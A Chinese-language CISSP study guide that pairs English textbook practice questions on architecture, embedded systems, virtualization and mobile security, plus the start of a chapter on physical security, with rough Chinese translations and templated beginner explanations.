先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 107 / PDF P650

第 650 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A. Java B. Flash C. JavaScript D. ActiveX 4. Your organization is considering deploying a publicly available screen saver to use spare system resources to process sensitive company data. What is a common security risk when using grid computing solutions that consume available resources from computers over the Internet? A. Loss of data privacy B. Latency of communication C. Duplicate work D. Capacity fluctuation 5. Your company is evaluating several cloud providers to determine which is the best fit to host your custom services as a custom application solution.

There are many aspects of security controls you need to evaluate, but the primary issues include being able to process significant amounts of data in short periods of time, controlling which applications can access which assets, and being able to prohibit VM sprawl or repetition of operations. Which of the following is not relevant to this selection process? A. Collections of entities, typically users, but can also be applications and devices, which can be granted or denied access to perform specific tasks or access certain resources or assets B. A VDI or VMI instance that serves as a virtual endpoint for accessing cloud assets and services C.

The ability of a cloud process to use or consume more resources (such as compute, memory, storage, or networking) when needed D. A management or security mechanism able to monitor and differentiate between numerous instances of the same VM, service, app, or resource 6. A large city's central utility company has seen a dramatic increase in the number of distribution nodes failing or going offline. An APT group was attempting to take over control of the utility company and was A. Java B. Flash C. JavaScript D. ActiveX 4.

中文直译 / 整理

您的组织正在考虑部署一个公开的屏幕保护程序,以利用空闲的系统资 源处理敏感的公司数据。 使用通过互联网消耗其他计算机可用资源的网格 计算解决方案时,常见的安全风险是什么? A. 数据隐私泄露 B. 通信延迟 C. 重复工作 D. 容量波动 5. 您的公司正在评估多个云提供商,以确定哪个最适合托管您的自定义服务 作为自定义应用程序解决方案。 您需要评估安全控制的多个方面,但主要问 题包括能够在短时间内处理大量数据、控制哪些应用程序可以访问哪些资产, 以及能够禁止虚拟机蔓延或操作重复。 以下哪一项与此选择过程无关? A. 实体的集合,通常是用户,但也可能是应用程序和设备,可以被授 予或拒绝执行特定任务或访问某些资源或资产的权限 B. 作为访问云资产和服务的虚拟端点的 VDI 或 VMI 实例 C. 云进程在需要时使用或消耗更多资源(如计算、内存、存储或网络) 的能力 D. 一种能够监控并区分同一虚拟机多个实例的管理或安全机制 , 服务 , 应用,o r r资源 6. 一座大城市的核心公用事业公司发现,其配电节点故障或离线的数量大幅增加。 一个高级持续性威胁(APT)组织正试图接管该公用事业公司的控制权,并且

小白解释

场景先行:你是公司的安全负责人,正在读第 650 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 650 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 108 / PDF P651

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

responsible for the system failures. Which of the following systems has the attacker compromised? A. MFP B. RTOS C. SoC D. SCADA 7. Your organization is concerned about information leaks due to workers taking home retired equipment. Which one of the following types of memory might retain information after being removed from a computer and therefore represents a security risk? A. Static RAM B. Dynamic RAM C. Secondary memory D. Real memory 8. Your organization is considering the deployment of a DCE to support a massively multiplayer online role-playing game (MMORPG) based on the characters of a popular movie franchise.

What is the primary concern of a DCE that could allow for propagation of malware or making adversarial pivoting and lateral movement easy? A. Unauthorized user access B. Identity spoofing C. Interconnectedness of the components D. Poor authentication 9. Your boss wants to automate the control of the building's HVAC system and lighting to reduce costs. He instructs you to keep costs low and use off-the-shelf IoT equipment. When you are using IoT equipment in a private environment, what is the best way to reduce risk? A. Use public IP addresses. B. Power off devices when not in use. C. Keep devices current on updates. D. Block access from the IoT devices to the Internet.

中文直译 / 整理

导致系统故障。 以下哪个系统已被攻击者入侵? A. MFP B. RTOS C. SoC D. SCADA 7. 您的组织担心员工导致的信息泄露 takin g 退休在家 e quipment。 以下哪一项 g types of 内存即使从计算机中移除后仍可能保留信息 因此代表一个安全风险? A. 静态随机存取存储 器 B. 动态随机存取存储器 C. 次级存储器 D. 实际存储器 8. 您的组织正在考虑部署一个DCE,以支持基于热门电影系列角色的大型多 人在线角色扮演游戏(MMORPG)。 DCE的主要关注点是什么,该关注点 可能导致恶意软件传播,或使对抗性横向移动变得容易? A. 未经授权的用户访问 B. 身份伪造 C. 组件的互连性 D. 身份验证差 9. 你的老板希望自动化控制大楼的暖通空调系统和照明以降低成本。 他指 示你保持低成本并使用现成的物联网设备。 当你在私有环境中使用物联网 设备时,降低风险的最佳方式是什么? A. 使用公网IP地址。 B. 不使用时关闭设备电源。 C. 保持设备及时更新。 D. 阻止物联网设备访问互联网。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

RTO 问时间:多久必须恢复。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 109 / PDF P652

第 652 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

10. Service-oriented architecture (SOA) constructs new applications or functions out of existing but separate and distinct software services. The resulting application is often new; thus, its security issues are unknown, untested, and unprotected. Which of the following is a direct extension of SOA that creates single-use functions that can be employed via an API by other software? A. Cyber-physical systems B. Fog computing C. DCS D. Microservices 11. A new local VDI has been deployed in the organization. There have been numerous breaches of security due to issues on typical desktop workstations and laptop computers used as endpoints.

Many of these issues stemmed from users installing unapproved software or altering the configuration of essential security tools. In an effort to avoid security compromises originating from endpoints in the future, all endpoint devices are now used exclusively as dumb terminals. Thus, no local data storage or application execution is performed on endpoints. Within the VDI, each worker has been assigned a VM containing all of their business necessary software and datasets.

These VMs are configured to block the installation and execution of new software code, data files cannot be exported to the actual endpoints, and each time a worker logs out, the used VM is discarded and a clean version copied from a static snapshot replaces it. What type of system has now been deployed for the workers to use? A. Cloud services B. Nonpersistent C. Thin clients D. Fog computing 12. A review of your company's virtualization of operations determines that the hardware resources supporting the VMs are nearly fully consumed. The auditor asks for the plan and layout of VM systems but is told that no such plan exists. This reveals that the company is suffering from what issue? 10.

中文直译 / 整理

面向服务的架构(SOA)利用现有的但独立且不同的软件服务构建新的应 用程序或功能。 由此产生的应用程序通常是全新的; 因此,其安全问题未知、 未经测试且未受保护。 以下哪项是SOA的直接扩展,可创建可通过API调用的 单次使用功能? 其他软件? A. 网络物理系统 B. 雾计算 C. DCS D. 微服务 11. 组织中已部署新的本地VDI。 由于典型桌面的问题,已发生多起安全泄露事件 用作终端的工作站和笔记本电脑。 许多问题源于用户安装了未经批准的软 件或更改了关键安全工具的配置。 为避免未来由终端引发的安全漏洞,所 有终端设备现在均仅作为哑终端使用。 因此,终端上不执行任何本地数据 存储或应用程序运行。 在虚拟桌面基础设施(VDI)中,每位员工都被分 配了一个包含其所有业务所需软件和数据集的虚拟机。 这些虚拟机已配置 为阻止新软件代码的安装和执行,数据文件无法导出到实际终端,且每次 员工注销时,所使用的虚拟机都会被丢弃,并用来自静态快照的干净版本 替换。 现在为员工部署的是何种系统? A. 云服务 B. 非持久性 C. 胖客户端 D. 雾计算 12. 对贵公司运营虚拟化的审查确定, 支持虚拟机的硬件资源几乎已被完全耗尽。

审计员要求提供虚拟机系统的 计划和布局,但被告知不存在此类计划。 这揭示了该公司正面临什么问题?

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 652 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 110 / PDF P653

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

A. Use of EOSL systems B. VM sprawl C. Poor cryptography D. VM escaping 13. A company server is currently operating at near maximum resource capacity, hosting just seven virtual machines. Management has instructed you to deploy six new applications onto additional VMs without purchasing new hardware since the IT/IS budget is exhausted. How can this be accomplished? A. Data sovereignty B. Infrastructure as code C. Containerization D. Process isolation 14. Which of the following is a primary concern when implementing security measures for industrial control systems (ICSs)? A. Confidentiality of sensor data B. Availability of real-time control signals C. Integrity of historical system logs D.

Nonrepudiation of operator commands 15. You have been tasked with designing and implementing a new security policy to address the new threats introduced by the recently installed embedded systems. What is a security risk of an embedded system that is not commonly found in a standard PC? A. Software flaws B. Access to the Internet C. Control of a mechanism in the physical world D. Power loss 16. A company is developing a new product to perform simple automated tasks related to indoor gardening. The device will be able to turn lights on and off and control a pump to transfer water. The technology to perform these automated tasks needs to be small and inexpensive. It only needs A.

中文直译 / 整理

使用EOSL系统 B. 虚拟机蔓延 C. 密码学薄弱 D. 虚拟机逃逸 13. 一台公司服务器当前几乎处于最大资源容量运行状态,仅托管七个虚拟 机。 管理层指示您在不购买新硬件的情况下将六个新应用程序部署到额外的 虚拟机上,因为IT/IS预算已耗尽。 如何实现这一目标? A. 数据主权 B. 基础设施即代码 C. 容器化 D. 进程隔离 14. 在为工业控制系统(ICS)实施安全措施时,以下哪一项是主要关注点? A. 传感器数据的机密性 B. 实时控制信号的可用性 C. 历史系统日志的完整性 D. 操作员命令的不可否认性性 15. 您被要求设计并实施一项新的安全策略,以应对最近安装的嵌入式系统引 入的新威胁。 嵌入式系统的一个安全风险,是标准PC中不常见的风险是什么? A. 软件缺陷 B. 访问互联网 C. 控制物理世界中的机制 D. 功率损耗 16. 一家公司正在开发一种新产品,用于执行与室内园艺相关的简单自动化任 务。 该设备能够开关灯光并控制水泵输送水。 执行这些自动化任务的技术需要 小巧且廉价。 它仅需

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

ISO 偏标准和管理体系。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 111 / PDF P654

第 654 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

minimal computational capabilities and does not need networking. The organization thinks that using an embedded system or a microcontroller may be able to provide the functionality necessary for the product. Which of the following is the best choice to use for this new product? A. Arduino B. RTOS C. MPP D. FPGA 17. You are developing a new product that is intended to process data to trigger real-world adjustments with minimal latency or delay. The current plan is to embed the code into a ROM chip to optimize for mission-critical operations. What type of solution is most appropriate for this scenario? A. Containerized application B. An Arduino C. DCS D. RTOS 18.

A major online data service wants to provide better response and access times for its users and visitors. They plan on deploying thousands of mini-web servers to ISPs across the nation. These mini-servers will host the few dozen main pages of their website so that users will be routed to the logically and geographically closest server for optimal performance and minimal latency. Only if a user requests data not on these miniservers will they be connecting to the centralized main web cluster hosted at the company's headquarters. What is this type of deployment commonly known as? A. Edge computing B. Fog computing C. Thin clients D. Infrastructure as code 19.

You are working on improving your organization's policy on mobile equipment. Because of several recent and embarrassing breaches, the company wants to increase security through technology as well as user

中文直译 / 整理

计算能力极低且无需网络。 该组织认为,使用嵌入式系统或微控制器可能 能够提供产品所需的功能。 以下哪一项是该新产品最合适的选择? A. Arduino B. RTOS C. MPP D. FPGA 17. 您正在开发一种新产品,旨在处理数据以尽可能低的延迟或延时触发现实 世界的调整。 当前计划是将代码嵌入到ROM芯片中,以优化关键任务操作。 对于此场景,最合适的解决方案是什么? A. 容器化应用程序 B. 一个Arduino C. DCS D. RTOS 18. 一家主要的在线数据服务公司希望为其用户和访客提供更好的响应速度和 访问时间。 他们计划在全国各地的ISP部署数千台微型Web服务器。 这些微 型服务器将托管其网站的几十个主要页面,以便用户被路由到逻辑上和地理 位置上最近的服务器,以实现最佳性能和最低延迟。 只有当用户请求的数据 不在这些微型服务器上时,才会连接到公司总部托管的集中式主Web集群。 这种部署方式通常称为什么? A. 边缘计算 B. 雾计算 C. 薄客户端 D. 基础设施即代码 19. 您正在致力于改进贵组织的移动政策 设备。 由于最近发生了几起令人尴尬的泄露事件,公司希望通过技术和用户

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 654 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RTO 问时间:多久必须恢复。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 112 / PDF P655

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

behavior and activities. What is the most effective means of reducing the risk of losing the data on a mobile device, such as a laptop computer? A. Defining a strong logon password B. Minimizing sensitive data stored on the mobile device C. Using a cable lock D. Encrypting the hard drive 20. The CISO has asked you to propose an update to the company's mobile device security policy. The main concerns are the intermingling of personal information with business data and complexities of assigning responsibility over device security, management, updates, and repairs. Which of the following would be the best option to address these issues? A. Bring your own device (BYOD) B.

Corporate-owned personally enabled (COPE) C. Choose your own device (CYOD) D. Corporate-owned mobile strategy (COMS)

中文直译 / 整理

行为和活动来增强安全性。 减少笔记本电脑等移动设备上数据丢失风险的最有 效方法是什么? A. 定义强登录密码 B. 最小化存储在移动设备上的敏感数据 C. 使用电缆锁 D. 加密硬盘 20. 首席信息安全官(CISO)要求您提出对公司移动设备安全策略的更新。 主要关切点是个人信息与业务数据的混合,以及在设备安全、管理、更新和 维修方面责任分配的复杂性。 以下哪项是解决这些问题的最佳方案? A. 自带设备(BYOD) B. 企业所有、个人启用(COPE) C. 自选设备(CYOD) D. 企业移动策略(COMS)

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
第 10 章 · P656-717 · 62 个学习单元

物理安全要求

OSG10 · Chapter 10 · Physical Security Requirements · 全文覆盖 + 小白精读 + 画报

第 10 章:物理安全要求

这不是提炼版。本页按 PDF 第 656-717 页连续覆盖第 10 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

62个连续学习单元
4格原文 / 直译 / 解释 / 考点
62页覆盖第10章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P656

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 10 Physical Security Requirements THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.8 Apply security principles to site and facility design 3.9 Design site and facility security controls 3.9.1 Wiring closets/intermediate distribution frame 3.9.2 Server rooms/data centers 3.9.3 Media storage facilities 3.9.4 Evidence storage 3.9.5 Restricted and work area security 3.9.6 Utilities and Heating, Ventilation, and Air Conditioning (HVAC) 3.9.7 Environmental issues (e.g., natural disasters, man-made) 3.9.8 Fire prevention, detection, and suppression 3.9.9 Power (e.g., redundant, backup) Domain 7: Security Operations 7.14 Implement and manage physical security 7.14.1 Perimeter security controls 7.14.2 Internal security controls The topic of physical and environmental security is referenced in several domains.

The primary occurrences are in Domain 3.0, “Security Architecture and Engineering,” and Domain 7.0, “Security Operations.” This chapter explores these issues and discusses safeguards and countermeasures to protect against them. You'll often need a disaster recovery plan or a business continuity plan should a severe physical event

中文直译 / 整理

第10章 物理安全要求 本章涵盖的CISSP主题包括: 领域3.0:安全架构与工程 3.8 将安全原则应用于站点和设施设计 3.9 设计站点和设施安全控制措施 3.9.1 配线间/中间分布架 3.9.2 服务器机房/数据中心 3.9.3 媒体存储设施 3.9.4 证据存储 3.9.5 受限区域和工作区安全 3.9.6 公用设施及供暖、通风与空调(HVAC) 3.9.7 环境问题(例如,自然灾害、人为因素) 3.9.8 防火、探测和灭火 3.9.9 电源(例如,冗余、备用) 领域 7:安全运营 7.14 实施和管理物理安全 7.14.1 周边安全控制 7.14.2 内部安全控制 物理和环境安全这一主题在多个领域中有所涉及。 主要出现在第3.0域“安全 架构与工程”和第7.0域“安全运营”中。 本章探讨了这些问题,并讨论了保护措施和应对策略,以防范这些风险。 当发 生严重的物理事件时,您通常需要制定灾难恢复计划或业务连续性计划。

小白解释

场景先行:你是公司的安全负责人,正在读第 656 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 02 / PDF P657

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

(such as an explosion, sabotage, or natural disaster) occur. Chapter 3, “Business Continuity Planning,” and Chapter 18, “Disaster Recovery Planning,” cover those topics in detail. Apply Security Principles to Site and Facility Design Without control over the physical environment, no collection of administrative, technical, or logical security controls can provide adequate protection. If a malicious person can gain physical access to your facility or equipment, they can do anything, including destruction, disclosure, and alteration. There are many aspects of implementing and maintaining physical security.

A core element is selecting or designing the facility to house your IT infrastructure and your organization's operations. The process of selecting or designing facility security always starts with a plan. Secure Facility Plan A secure facility plan outlines your organization's security needs and emphasizes methods or mechanisms to employ to provide security. Such a plan is developed through risk assessment and critical path analysis. Critical path analysis is a systematic effort to identify relationships between missioncritical applications, processes, and operations and all the necessary supporting elements, both physical and technological.

For example, an online store relies on internet access, computer hardware, electricity, temperature control, storage facilities, etc. When critical path analysis is performed properly, a complete picture of the interdependencies and interactions necessary to sustain the organization is produced. The first step in designing a secure IT infrastructure is providing security for the organization's and its computers' basic requirements. These basic requirements include electricity, environmental controls (in other words, a building, air conditioning, heating, humidity control, and so on), and water/sewage.

While examining critical paths, it is also important to evaluate completed or potential technology convergence. Technology convergence is the tendency for various technologies, solutions, utilities, and systems to evolve and merge over time. Often, this results in multiple systems performing similar or (

中文直译 / 整理

例如爆炸、破坏或自然灾害)发生时。 第3章,“业务连续性规划”, 和第18章,“灾难恢复规划”,详细介绍了这些主题。 将安全原则应用于站点和设施设计 如果没有对物理环境的控制,任何行政、技术或逻辑安全控制的组合都无法 提供充分的保护。 如果恶意人员能够获得对您的设施或设备的物理访问权限, 他们可以做任何事情,包括破坏、泄露和篡改。 实施和维护物理安全涉及许多方面。 一个核心要素是选择或设计用于容纳您的 IT基础设施和组织运营的设施。 选择或设计设施安全的过程总是从一个计划开 始。 安全设施计划 一个 安全设施计划 阐述了您的组织的安全需求,并强调了为提供安全而采用的 方法或机制。 此类计划通过风险评估和关键路径分析制定。 关键路径分析 是一 种系统性努力,旨在识别关键任务应用、流程和操作与所有必要支持元素(包 括物理和科技元素)之间的关系。 例如,在线商店依赖于互联网接入、计算机 硬件、电力、温控、存储设施等。 当正确执行关键路径分析时,将产生一幅完整描绘组织运行所需相互依赖性和 交互关系的图景。 设计安全IT基础设施的第一步是为组织及其计算机的基本需 求提供安全保护。

这些基本需求包括电力、环境控制(即建筑物、空调、供暖、 湿度控制等)以及供水/排水。 在检查关键路径时,评估已完成或潜在的技术融合也非常重要。 技术融合是指 各种技术、解决方案、工具和系统随着时间推移而演化并合并的趋势。 通常, 这会导致多个系统执行相似或

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

NIST:NIST 提供美国常用安全标准、框架和指南。

